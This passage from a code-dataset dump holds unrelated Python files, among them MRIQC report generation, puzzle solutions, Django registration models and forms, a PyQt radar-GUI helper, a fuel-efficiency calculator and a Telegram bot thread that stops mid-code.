_write_report(\n dframe, FUNC_SPATIAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=op.join(wdir, 'ftemporal.pdf'))\n\n concat_pdf([fspatial, ftemporal], out_file)\n return out_file\n\ndef generate_csv(data_type, settings):\n datalist = []\n errorlist = []\n jsonfiles = glob.glob(op.join(settings['work_dir'], 'derivatives', '%s*.json' % data_type))\n\n if not jsonfiles:\n raise RuntimeError('No individual QC files were found in the working directory'\n '\\'%s\\' for the \\'%s\\' data type.' % (settings['work_dir'], data_type))\n\n for jsonfile in jsonfiles:\n dfentry = _read_and_save(jsonfile)\n if dfentry is not None:\n if 'exec_error' not in dfentry.keys():\n datalist.append(dfentry)\n else:\n errorlist.append(dfentry['subject_id'])\n\n dataframe = pd.DataFrame(datalist)\n cols = dataframe.columns.tolist() # pylint: disable=no-member\n\n reorder = []\n for field in ['run', 'session', 'subject']:\n for col in cols:\n if col.startswith(field):\n reorder.append(col)\n\n for col in reorder:\n cols.remove(col)\n cols.insert(0, col)\n\n if 'mosaic_file' in cols:\n cols.remove('mosaic_file')\n\n # Sort the dataframe, with failsafe if pandas version is too old\n try:\n dataframe = dataframe.sort_values(by=['subject_id', 'session_id', 'run_id'])\n except AttributeError:\n #pylint: disable=E1101\n dataframe = dataframe.sort(columns=['subject_id', 'session_id', 'run_id'])\n\n # Drop duplicates\n try:\n #pylint: disable=E1101\n dataframe.drop_duplicates(['subject_id', 'session_id', 'run_id'], keep='last',\n inplace=True)\n except TypeError:\n #pylint: disable=E1101\n dataframe.drop_duplicates(['subject_id', 'session_id', 'run_id'], take_last=True,\n inplace=True)\n\n out_fname = op.join(settings['output_dir'], data_type + 'MRIQC.csv')\n dataframe[cols].to_csv(out_fname, index=False)\n return dataframe, errorlist\n\n\ndef _read_and_save(in_file):\n with open(in_file, 'r') as jsondata:\n values = _flatten(json.load(jsondata))\n return values\n return None\n\n\ndef _flatten(in_dict, parent_key='', sep='_'):\n items = []\n for k, val in list(in_dict.items()):\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(val, collections.MutableMapping):\n items.extend(_flatten(val, new_key, sep=sep).items())\n else:\n items.append((new_key, val))\n return dict(items)\n","sub_path":"reports/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":14207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463775537","text":"class Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\n# recursive\nclass Solution(object):\n def postorder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n for n in root.children:\n ans.extend(self.postorder(n))\n ans.append(root.val)\n return ans\n\n# iterative\nclass Solution1(object):\n def postorder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n stack = []\n stack.append(root)\n result = []\n while len(stack) > 0:\n pop = stack.pop()\n result = [pop.val] + result\n # mind the order of the children\n for i in range(len(pop.children)):\n stack.append(pop.children[i])\n return result","sub_path":"leetcode/590-n-ary-tree-postorder-traversal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"604295299","text":"def safe_pawns(pawns):\n \n safePawns = 0\n \n for pawn in pawns:\n col = pawn[0]\n row = pawn[1]\n \n defenseRow = str(int(row)-1)\n defenseLeft = chr(ord(col)-1) + defenseRow\n defenseRight = chr(ord(col)+1) + defenseRow\n \n if defenseLeft in pawns or defenseRight in pawns:\n safePawns += 1\n \n return safePawns\n","sub_path":"CiO/pawn-brotherhood.py","file_name":"pawn-brotherhood.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97079298","text":"import numpy as np\nimport LinearClassifier\n\ndef read_arff(datafile):\n data = []\n with open(datafile, \"r\") as f:\n for line in f:\n name = line.split(' ')\n\n tag = name[0].lower()\n if tag == '@attribute' or tag == '@data' or tag == '@relation':\n continue\n\n data_line = np.zeros(101)\n data_list = tag.strip('\\n').split(',')\n for i, feature in enumerate(data_list):\n if feature == '1' or feature == '+':\n data_line[i] = 1\n elif feature == '0' or feature == '-':\n data_line[i] = 0\n\n data.append(data_line)\n return np.array(data)\n\ndef main():\n data = read_arff(\"decision-trees/modified.badge.data.arff\")\n\n alpha_choices = [0.001, 0.01] # Learning rate\n err_thres_choices = [1e-3, 1e-2] # Error threshold\n weight_init_choices = [1e-1] # Weight initialization range\n\n fold1 = data[0:65]\n fold2 = data[65:122]\n fold3 = data[122:168]\n fold4 = data[168:234]\n fold5 = data[234:296]\n folds = [fold1, fold2, fold3, fold4, fold5]\n\n # Cross Validation\n model_avgs = []\n model_stds = []\n for k in range(10):\n\n # Randomly pick the hyperparameters\n alpha = np.random.choice(alpha_choices)\n err_thres = np.random.choice(err_thres_choices)\n weight_init = np.random.choice(weight_init_choices)\n print(\"Alpha: %f, Error Threshold: %f, Weight Init: %f\" % (alpha, err_thres, weight_init))\n\n accuracies = np.zeros(5)\n for i in range(5):\n\n # Split data folds into validation and training data\n X_train = np.vstack([folds[j][:, 0:100] for j in range(5) if j != i])\n y_train = np.hstack([2*folds[j][:, 100]-1 for j in range(5) if j != i])\n X_val = folds[i][:, 0:100]\n y_val = 2*folds[i][:, 100] - 1\n\n # Create and train model\n lc = LinearClassifier.LinearClassifier()\n lc.train(X_train, y_train, alpha, err_thres, weight_init)\n\n # Test model on training and testing data\n train_accuracy = lc.test(X_train, y_train)\n accuracy = lc.test(X_val, y_val)\n\n # Save the best model\n accuracies[i] = accuracy\n print(\"Train Accuracy: %f\" % (train_accuracy))\n print(\"Validation Accuracy: %f\" % (accuracy,))\n\n print(\" \")\n model_avgs.append(np.mean(accuracies))\n model_stds.append(np.std(accuracies))\n print(\"Accuracies: \", model_avgs)\n print(\"Standard Dev: \", model_stds)\n\nif __name__ == \"__main__\":\n main()","sub_path":"hw2/higa2-hw2/badges_stump.py","file_name":"badges_stump.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481761568","text":"\"\"\"\n2주차 스터디 퀴즈\n\n- 1번 문제\n\n정수를 하나 씩 입력 받아서 0을 입력하면 이전까지 입력한 정수 모든 합을 출력하기\nex)\n숫자 입력 : 5\n숫자 입력 : 4\n숫자 입력 : 3\n숫자 입력 : 2\n숫자 입력 : 10\n숫자 입력 : -1\n숫자 입력 : 0\n결과 : 23\n\"\"\"\nvalueSum = 0\n\nwhile True:\n inputValue = int(input(\"숫자 입력 >\"))\n\n if inputValue == 0 :\n print(\"결과 : {}\".format(valueSum))\n break\n\n valueSum += inputValue\n\n\n\"\"\"\n- 2번 문제\n\n피라미드 별찍기\nex) 찍을 줄 수 : 4\n *\n ***\n *****\n*******\n\"\"\"\n\nrowCount = int(input(\"줄 
수>\"))\n\nfor i in range(1, rowCount + 1):\n print(\" \" * (rowCount - i), \"*\" * (i * 2 - 1), sep=\"\")\n\n\n\"\"\"\n- 3번 문제\n\n리스트 내포를 사용해서 0 ~ 100 까지의 수 중 2와 3의 공배수를 출력하기\n단, 답은 한줄로 표현 가능해야 함 (2와 3이 포함되어야함)\n단, if 안에는 하나의 조건만 판단해야 함\nex) [0, 6, 12, 18, 24, 30, 36, 42, 48, 54, 60, 66, 72, 78, 84, 90, 96]\n추가: 플머님들은 if문에 조건은 단 하나로 해야하고, 가장 최적화된 결과를 도출해 낼 수 있도록 할것\n\"\"\"\nprint( [ i for i in range(0, 100+1, 2) if i % 3 == 0])\n\n\n\"\"\"\n- 4번 문제\n\n10개의 문자를 입력 받아서 같은 문자열의 개수를 세는 Dict를 print 한다.\n\nex)\n1문자 입력 : ABC\n2문자 입력 : ABC\n3문자 입력 : GOOD\n4문자 입력 : BC\n5문자 입력 : BC\n6문자 입력 : ABC\n7문자 입력 : GOOD\n8문자 입력 : ABC\n9문자 입력 : ABC\n10문자 입력 : ABC\n\n결과 : {'ABC': 6, 'GOOD' : 2, 'BC':2}\n\"\"\"\n\ninputCount = 1\ndic = {}\n\nwhile True:\n inString = str(input(\"{}문자 입력 >\".format(inputCount)))\n inputCount += 1\n\n if inString == \"quit\":\n break\n \n if not (inString in dic):\n dic[inString] = 1\n else:\n dic[inString] += 1\n \nprint(dic)","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28525859","text":"class Good:\n \"\"\"[class for goods in store]\n \"\"\"\n def __init__(self,name , barcode,brand,price):\n \"\"\"[summary]\n\n Args:\n name ([str]): [name of product]\n barcode ([int]): [barcode of product]\n brand ([str]): [brand of product]\n price ([int]): [price of product]\n \"\"\"\n self.name= name\n self.barcode=barcode\n self.brand=brand\n self.price=price","sub_path":"phase 2/good_class.py","file_name":"good_class.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"538451235","text":"from django.db import models\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.utils import translation\n\nfrom django_personals.models import (\n PersonAbstract,\n ContactAbstract,\n AddressAbstract,\n SocialAbstract,\n SkillAbstract,\n AwardAbstract,\n FormalEduAbstract,\n NonFormalEduAbstract,\n WorkingAbstract,\n VolunteerAbstract,\n PublicationAbstract,\n FamilyAbstract\n)\n\n_ = translation.gettext_lazy\n\n\nclass Person(PersonAbstract):\n class Meta:\n verbose_name = _('Person')\n verbose_name_plural = _('Persons')\n\n\nclass PersonContact(ContactAbstract):\n person = models.OneToOneField(\n Person, on_delete=models.CASCADE,\n related_name='contact')\n\n\nclass SocialMedia(SocialAbstract):\n person = models.OneToOneField(\n Person, on_delete=models.CASCADE,\n related_name='social_media'\n )\n\n\nclass PersonAddress(AddressAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='addresses'\n )\n\n\nclass Skill(SkillAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='skills'\n )\n\n\nclass Award(AwardAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='awards'\n )\n\n\nclass FormalEducation(FormalEduAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='formal_educations'\n )\n\n\nclass NonFormalEducation(NonFormalEduAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='non_formal_educations'\n )\n\n\nclass Working(WorkingAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='work_histories'\n )\n\n\nclass Volunteer(VolunteerAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n 
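# deleting a Person cascades to their volunteer records; reverse accessor: person.volunteers.all()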
related_name='volunteers'\n )\n\n\nclass Publication(PublicationAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='publications'\n )\n\n\nclass Family(FamilyAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='families'\n )\n","sub_path":"example/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"95093049","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import (\n QWidget, QLabel, QFrame, QVBoxLayout, QHBoxLayout, QToolButton, QGridLayout, QCheckBox,\n QLineEdit, QDialog, QPushButton, QSpinBox\n)\nimport sys\nimport os\nfrom argparse import ArgumentParser\nimport acconeer_utils\n\n\ndef lib_version_up_to_date(gui_handle=None):\n fdir = os.path.dirname(os.path.realpath(__file__))\n fn = os.path.join(fdir, \"../../lib/acconeer_utils/__init__.py\")\n if os.path.isfile(fn):\n with open(fn, \"r\") as f:\n lines = [line.strip() for line in f.readlines()]\n\n for line in lines:\n if line.startswith(\"__version__\"):\n fs_lib_ver = line.split(\"=\")[1].strip()[1:-1]\n break\n else:\n fs_lib_ver = None\n else:\n fs_lib_ver = None\n\n used_lib_ver = getattr(acconeer_utils, \"__version__\", None)\n\n rerun_text = \"You probably need to rerun setup.py (python setup.py install --user)\"\n error_text = None\n if used_lib_ver:\n sb_text = \"Lib v{}\".format(used_lib_ver)\n\n if fs_lib_ver != used_lib_ver:\n sb_text += \" (mismatch)\"\n error_text = \"Lib version mismatch.\"\n error_text += \" Installed: {} Latest: {}\\n\".format(used_lib_ver, fs_lib_ver)\n error_text += rerun_text\n else:\n sb_text = \"Lib version unknown\"\n error_text = \"Could not read installed lib version\" + rerun_text\n\n if gui_handle is not None:\n gui_handle.labels[\"libver\"].setText(sb_text)\n if error_text and sys.executable.endswith(\"pythonw.exe\"):\n gui_handle.error_message(error_text)\n else:\n if not sys.executable.endswith(\"pythonw.exe\") and error_text:\n prompt = \"\\nThe GUI might not work properly!\\nContinue anyway? 
[y/N]\"\n while True:\n print(error_text + prompt)\n choice = input().lower()\n if choice.lower() == \"y\":\n return True\n elif choice == \"\" or choice.lower() == \"n\":\n return False\n else:\n sys.stdout.write(\"Please respond with 'y' or 'n' \"\n \"(or 'Y' or 'N').\\n\")\n return True\n\n\nclass AdvancedSerialDialog(QDialog):\n def __init__(self, state, parent):\n super().__init__(parent)\n\n self.setMinimumWidth(350)\n self.setModal(True)\n self.setWindowTitle(\"Advanced serial settings\")\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n texts = [\n \"Please note:\",\n (\n \"Overriding the baudrate disables automatic\"\n \" detection and negotiation of baudrate.\"\n ),\n \"Only use on special hardware.\",\n ]\n\n for text in texts:\n lbl = QLabel(text, self)\n lbl.setWordWrap(True)\n layout.addWidget(lbl)\n\n layout.addStretch(1)\n\n self.cb = QCheckBox(\"Override baudrate\", self)\n self.cb.stateChanged.connect(self.cb_state_changed)\n layout.addWidget(self.cb)\n\n self.sb = QSpinBox(self)\n self.sb.setRange(1, int(3e6))\n layout.addWidget(self.sb)\n\n layout.addStretch(1)\n\n buttons_widget = QWidget(self)\n layout.addWidget(buttons_widget)\n hbox = QHBoxLayout()\n buttons_widget.setLayout(hbox)\n hbox.addStretch(1)\n cancel_btn = QPushButton(\"Cancel\")\n cancel_btn.clicked.connect(self.reject)\n hbox.addWidget(cancel_btn)\n save_btn = QPushButton(\"Save\")\n save_btn.setDefault(True)\n save_btn.clicked.connect(self.accept)\n hbox.addWidget(save_btn)\n\n self.set_state(state)\n\n def cb_state_changed(self, state):\n self.sb.setEnabled(bool(state))\n\n def set_state(self, state):\n checked = state is not None\n self.cb.setChecked(checked)\n self.cb_state_changed(checked)\n self.sb.setValue(state if checked else 115200)\n\n def get_state(self):\n return self.sb.value() if self.cb.checkState() else None\n\n\nclass GUIArgumentParser(ArgumentParser):\n def __init__(self):\n super().__init__()\n\n self.add_argument(\"-ml\",\n \"--machine-learning\",\n dest=\"machine_learning\",\n help=\"Enable machine learning\",\n action=\"store_true\")\n\n self.add_argument(\"-b\",\n \"--beta-features\",\n dest=\"beta_features\",\n help=\"Enable beta features\",\n action=\"store_true\")\n\n\nclass Label(QLabel):\n def __init__(self, img, img_scale=0.7):\n super(Label, self).__init__()\n\n self.img_scale = img_scale\n self.pixmap = QPixmap(img)\n\n self.setMinimumSize(1, 1)\n self.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignHCenter)\n self.setPixmap(self.pixmap)\n\n def resizeEvent(self, event):\n w = self.size().width() * self.img_scale\n h = self.size().height() * self.img_scale\n scaled_size = QtCore.QSize(w, h)\n\n scaled_pixmap = self.pixmap.scaled(\n scaled_size,\n QtCore.Qt.KeepAspectRatio,\n QtCore.Qt.SmoothTransformation,\n )\n\n self.setPixmap(scaled_pixmap)\n\n\nclass CollapsibleSection(QFrame):\n def __init__(self, header_text, init_collapsed=False, is_top=False):\n super().__init__()\n\n if not is_top:\n self.setObjectName(\"CollapsibleSection\")\n self.setStyleSheet(\"#CollapsibleSection{border-top: 1px solid lightgrey;}\")\n\n self._layout = QVBoxLayout(self)\n self._layout.setContentsMargins(0, 0, 0, 0)\n self._layout.setSpacing(0)\n self.setLayout(self._layout)\n self._header_widget = QWidget()\n self.body_widget = QWidget()\n self._layout.addWidget(self._header_widget)\n self._layout.addWidget(self.body_widget)\n\n self.grid = QGridLayout(self.body_widget)\n self.grid.setContentsMargins(9, 0, 9, 9)\n self.grid.setColumnStretch(0, 1)\n self.grid.setColumnStretch(1, 
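# give both grid columns equal stretch (column 0 was set just above)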
1)\n\n self._header_widget_layout = QHBoxLayout(self._header_widget)\n self._header_widget_layout.setContentsMargins(7, 7, 7, 7)\n self._header_widget.setLayout(self._header_widget_layout)\n\n self._button = QToolButton()\n self._button.setText(header_text)\n self._button.setCheckable(True)\n self._button.setStyleSheet(\"QToolButton { border: none; }\")\n self._button.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self._button.pressed.connect(self.button_event)\n self.button_event(override=init_collapsed)\n self._header_widget_layout.addWidget(self._button)\n self._header_widget_layout.addStretch()\n\n def button_event(self, override=None):\n if override is None:\n checked = not self._button.isChecked()\n else:\n checked = override\n self._button.setChecked(checked)\n\n if checked: # collapsed\n self._button.setArrowType(QtCore.Qt.ArrowType.RightArrow)\n self.body_widget.hide()\n else:\n self._button.setArrowType(QtCore.Qt.ArrowType.DownArrow)\n self.body_widget.show()\n\n\nclass SensorSelection(QFrame):\n def __init__(self, multi_sensors=False, error_handler=None, callback=None):\n super().__init__()\n\n self.error_handler = error_handler\n self.multi_sensors = multi_sensors\n self.cb = callback\n self.select_hist = [1, 0, 0, 0]\n\n # text, checked, visible, enabled, function\n checkbox_info = {\n \"sensor_1\": (\"1\", True, True, True, lambda: self.sensor_limits(1)),\n \"sensor_2\": (\"2\", False, True, True, lambda: self.sensor_limits(2)),\n \"sensor_3\": (\"3\", False, True, True, lambda: self.sensor_limits(3)),\n \"sensor_4\": (\"4\", False, True, True, lambda: self.sensor_limits(4)),\n }\n\n self.checkboxes = {}\n for key, (text, checked, visible, enabled, func) in checkbox_info.items():\n cb = QCheckBox(text, self)\n cb.setChecked(checked)\n cb.setVisible(visible)\n cb.setEnabled(enabled)\n if func:\n cb.stateChanged.connect(func)\n self.checkboxes[key] = cb\n\n self.textbox = QLineEdit()\n self.textbox.setText(\"1\")\n self.textbox.editingFinished.connect(lambda: self.check_value())\n\n self.grid = QtWidgets.QGridLayout(self)\n self.grid.setContentsMargins(0, 0, 0, 0)\n self.grid.addWidget(self.checkboxes[\"sensor_1\"], 0, 0)\n self.grid.addWidget(self.checkboxes[\"sensor_2\"], 0, 1)\n self.grid.addWidget(self.checkboxes[\"sensor_3\"], 0, 2)\n self.grid.addWidget(self.checkboxes[\"sensor_4\"], 0, 3)\n self.grid.addWidget(self.textbox, 0, 4)\n\n self.set_multi_sensor_support(multi_sensors)\n\n def get_sensors(self):\n sensors = []\n if self.multi_sensors:\n for s in range(1, 5):\n sensor_id = \"sensor_{:d}\".format(s)\n if self.checkboxes[sensor_id].isChecked():\n sensors.append(s)\n else:\n sensors.append(int(self.textbox.text()))\n\n return sensors\n\n def set_sensors(self, sensors):\n if not sensors:\n sensors = []\n\n if not isinstance(sensors, list):\n sensors = [sensors]\n\n try:\n if len(sensors) > 1:\n self.set_multi_sensor_support(True)\n except Exception as e:\n self.error_handler(\"Could not set sensor {}\".format(e))\n\n if self.multi_sensors:\n for s in range(1, 5):\n enabled = s in sensors\n sensor_id = \"sensor_{:d}\".format(s)\n self.checkboxes[sensor_id].setChecked(enabled)\n else:\n if isinstance(sensors, list):\n sensors = sensors[0]\n try:\n self.textbox.setText(str(sensors))\n except Exception as e:\n self.error_handler(\"Could not set sensor {}\".format(e))\n\n def set_multi_sensor_support(self, multi_sensors):\n if multi_sensors is None:\n multi_sensors = False\n self.multi_sensors = multi_sensors\n\n if isinstance(multi_sensors, list):\n 
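# a sensor list still counts as multi-sensor mode for the widget logic below; the list itself caps how many boxes may be checked (see sensor_limits)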
multi_sensors = True\n\n self.textbox.setVisible(not multi_sensors)\n\n for s in range(1, 5):\n sensor_id = \"sensor_{:d}\".format(s)\n self.checkboxes[sensor_id].setVisible(multi_sensors)\n\n if multi_sensors:\n self.sensor_limits()\n\n def check_value(self):\n error = None\n if not self.textbox.text().isdigit():\n error = \"Sensor must be an integer between 1 and 4!\\n\"\n self.textbox[\"sensor\"].setText(\"1\")\n else:\n sensor = int(self.textbox.text())\n e = sensor < 1 or sensor > 4\n if e:\n error = \"Sensor must be an integer between 1 and 4!\\n\"\n self.textbox.setText(\"1\")\n\n if error is not None and self.error_message is not None:\n self.error_handler(error)\n\n def sensor_limits(self, sensor=None):\n if not self.multi_sensors:\n return\n\n if sensor:\n if self.checkboxes[\"sensor_%d\" % sensor].isChecked():\n if sensor not in self.select_hist:\n self.select_hist.insert(0, sensor)\n self.select_hist.pop(4)\n if not self.checkboxes[\"sensor_%d\" % sensor].isChecked():\n if sensor in self.select_hist:\n self.select_hist.pop(self.select_hist.index(sensor))\n self.select_hist.insert(3, 0)\n\n # if self.multi_sensors is a list, we limit the max nr of sensor to its length\n if isinstance(self.multi_sensors, list):\n allowed_nr = len(self.multi_sensors)\n current_nr = len(self.get_sensors())\n diff = current_nr - allowed_nr\n s = 3\n while diff > 0 and s >= 0:\n if self.select_hist[s]:\n sensor_id = \"sensor_{:d}\".format(self.select_hist[s])\n self.checkboxes[sensor_id].setChecked(False)\n self.select_hist[s] = 0\n self.select_hist.pop(s)\n self.select_hist.insert(3, 0)\n diff = len(self.get_sensors()) - len(self.multi_sensors)\n s -= 1\n\n if self.cb is not None:\n self.cb()\n\n\nclass ErrorFormater:\n def __init__(self):\n pass\n\n def error_to_text(self, error):\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n err_text = \"File: {}
<br>Line: {}<br>
    Error: {}\".format(fname, exc_tb.tb_lineno, error)\n\n return err_text\n\n\nclass QHLine(QFrame):\n def __init__(self):\n super(QHLine, self).__init__()\n self.setFrameShape(QFrame.HLine)\n self.setFrameShadow(QFrame.Sunken)\n\n\nclass QVLine(QFrame):\n def __init__(self):\n super(QVLine, self).__init__()\n self.setFrameShape(QFrame.VLine)\n self.setFrameShadow(QFrame.Sunken)\n\n\nclass PassthroughProcessor:\n def __init__(self, sensor_config, processing_config, session_info):\n pass\n\n def process(self, data):\n return data\n\n\nclass Count:\n def __init__(self, val=0):\n self.val = val\n\n def pre_incr(self):\n self.val += 1\n return self.val\n\n def post_incr(self):\n ret = self.val\n self.val += 1\n return ret\n\n def decr(self, val=1):\n self.val -= val\n\n def set_val(self, val):\n self.val = val\n\n\nclass GUI_Styles:\n def get_button_style(self):\n return (\n \"QPushButton {\"\n \"background-color: #f0f0f0;\"\n \"border-width: 1px;\"\n \"border-color: #339;\"\n \"}\"\n \"QPushButton:pressed {\"\n \"background-color: red;\"\n \"}\"\n \"QPushButton:hover:!pressed {\"\n \"background-color: lightcoral;\"\n \"}\"\n )\n","sub_path":"gui/elements/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":14255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149748697","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom abc_admin.models import Registration, ClientUser, Session, Stagiaire\nimport datetime\n\n#Registration Form\nclass RegistrationForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n super(RegistrationForm, self).__init__(*args, **kwargs)\n self.client = ClientUser.objects.filter(user=self.request.user).latest('user')\n self.session = Session.objects.get(pk=self.request.GET['session_id'])\n self.fields['participant_list'].queryset = Stagiaire.objects.filter(corporate=self.client.corporate)\n self.fields['participant_list'].required = False\n\n\n participant = forms.IntegerField(label='Nombre de participant :', required=True)\n PAIEMENT_CHOICES = (\n ('Entreprise','Entreprise'),\n ('OPCA','OPCA'),\n )\n paiement = forms.ChoiceField(label='Mode de reglement :', required=True, choices=PAIEMENT_CHOICES)\n class Meta:\n model = Registration\n fields = ['paiement', 'participant','participant_list']\n labels = {\n 'participant_list': \"Liste des participants :\"\n }\n\n def clean_participant(self):\n participant_max = self.session.participant_number\n participant = self.cleaned_data.get('participant')\n\n if participant>participant_max:\n raise forms.ValidationError('Il n\\'y a pas assez de place disponile. 
Il reste '+str(participant_max)+ ' place(s) pour cette session de formation.')\n\n return participant\n\n def clean_participant_list(self):\n participant = self.cleaned_data.get('participant')\n participant_list = self.cleaned_data.get('participant_list')\n if participant_list.count() > participant:\n raise forms.ValidationError('Vous devez selectionner autant ou moins de stagiaire.')\n\n if participant==0:\n raise forms.ValidationError('Vous devez selectionner au moins 1 participants.')\n\n return participant_list\n\n\n\n\n def save(self, commit=True):\n registration = super(RegistrationForm, self).save(commit=False)\n count = Registration.objects.count()\n if count == 0:\n new_key = int(datetime.date.today().strftime(\"%y\"))*1000 + 1\n else:\n new_key = Registration.objects.latest('id').key + 1\n registration.key = new_key\n registration.client = self.client\n registration.session = self.session\n if commit:\n registration.save()\n last_available_place = registration.session.participant_number\n registration.session.participant_number = last_available_place-self.cleaned_data.get('participant')\n registration.session.save()\n\n return registration\n\nclass StagiaireForm(forms.ModelForm):\n class Meta:\n model = Stagiaire\n exclude = ('corporate',)\n labels = {\n 'firstname': 'Prenom :',\n 'lastname': \"Nom :\",\n 'sexe': \"Sexe :\",\n 'phone': \"Telephone :\",\n 'mails': \"Adresse mails :\",\n 'poste': \"Poste :\",\n }\n def save(self, commit=True):\n stagiaire = super(StagiaireForm, self).save(commit=False)\n if commit:\n stagiaire.save()\n return stagiaire\n","sub_path":"abc_front/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149013938","text":"# encoding: UTF-8\n# Genaro Ortiz Durán, A01375315\n# Descripción: Diseño topd-down para encontrar el rendimiento de un auto.\n\n#Calcula el rendimiento en km/l dividiendo los kilometros entre la gasolina.\ndef rendimiento(kilometros,gasolina):\n r=(kilometros/gasolina)\n return r\n#Para convertir los km/l a mi/ga se divide los (km entre km1)=M y la (gasolina se multiplica por g)=G.Por último se divide M entre G.\ndef conversion(kilometros,gasolina):\n km1=1.609344\n g=\t0.264172051\n M=kilometros/km1\n G=gasolina*g\n c=(M/G)\n return c\n#La función divide los kilometros entre la gasolina, el resultado se utiliza como divisor de la distancia.\ndef litros(kilometros,gasolina,distancia):\n a=(kilometros/gasolina)\n d=(distancia/a)\n return d\n\n\n\n\n\ndef main():\n kilometros=int(input(\"Teclea el número de kilometros recorridos:\"))\n gasolina=int(input(\"Teclea el número de litros de gasolina usados:\"))\n print(\"Si recorres\",kilometros,\"con\",gasolina,\"litros de gasolina\",\"el rendimiento es:\",format(rendimiento(kilometros,gasolina),\".2f\"),\"km/l\",format(conversion(kilometros,gasolina),\".2f\"),\"mi/gal\")\n distancia = int(input(\"¿Cuantos kilometros vas a recorrer:\"))\n print(\"Para recorrer\",distancia,\"km\",\"necesitas\",format(litros(kilometros,gasolina,distancia),\".2f\"),\"litros de gasolina\")\nmain()\n","sub_path":"Rendimiento.py","file_name":"Rendimiento.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591360282","text":"import eb_thread, eb_message\n\nimport telepot, random\n\ndef read_private(filename):\n with open(\"private/\" + filename, \"r\") as f:\n return f.read().replace('\\n', 
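# strip the trailing newline so the token is clean for telepot.Bot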
'')\n\nTOKEN = read_private(\"telegram_token\")\n\nbot_name = \"Enfors_bot\"\n\nclass TelegramThread(eb_thread.Thread):\n def __init__(self, name, config):\n super().__init__(name, config)\n\n self.state = None # Temp. Remove later.\n\n \n def run(self):\n super().run()\n with self.config.lock:\n self.bot = telepot.Bot(TOKEN)\n\n self.bot.message_loop(self.handle_message)\n \n message = eb_message.Message(\"Telegram\", eb_message.MSG_TYPE_THREAD_STARTED)\n self.config.send_message(\"Main\", message)\n\n while True:\n try:\n message = self.config.recv_message(\"Telegram\")\n\n if (message.msg_type == eb_message.MSG_TYPE_STOP_THREAD):\n self.stop()\n return\n \n if message.msg_type == eb_message.MSG_TYPE_USER_MESSAGE:\n self.bot.sendMessage(message.data[\"user\"],\n message.data[\"text\"])\n except error:\n print(\"ERROR: %s\" % error)\n self.config.set_thread_state(\"Telegram\", \"exception\")\n time.sleep(60)\n\n \n\n\n def handle_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n\n if content_type == \"text\":\n text = msg[\"text\"].strip()\n user = msg[\"chat\"][\"id\"]\n\n if text[0] == \"/\":\n text = text[1:]\n\n if text.lower().startswith(\"@enfors_bot \"):\n text = text[12:]\n \n print(\"Telegram: Incoming message from %s(%d): '%s'\" %\n (msg[\"from\"][\"first_name\"], user, text))\n\n # If this is a kind of message only Telegram can handle\n # (inline keyboards, etc), then don't send it to the\n # main thread.\n if self.handle_telegram_message(text.lower(), user):\n return\n\n # Send the message to the main thread.\n message = eb_message.Message(\"Telegram\",\n eb_message.MSG_TYPE_USER_MESSAGE,\n { \"user\": msg[\"chat\"][\"id\"],\n \"text\": text })\n self.config.send_message(\"Main\", message)\n else:\n print(\"Incoming %s message, ignoring.\", content_type)\n\n\n\n def handle_telegram_message(self, text, user):\n if text == \"rps\": # Rock paper scissors\n self.state = \"rps\"\n\n show_keyboard = { \"keyboard\" : [[\n \"rock\", \"paper\", 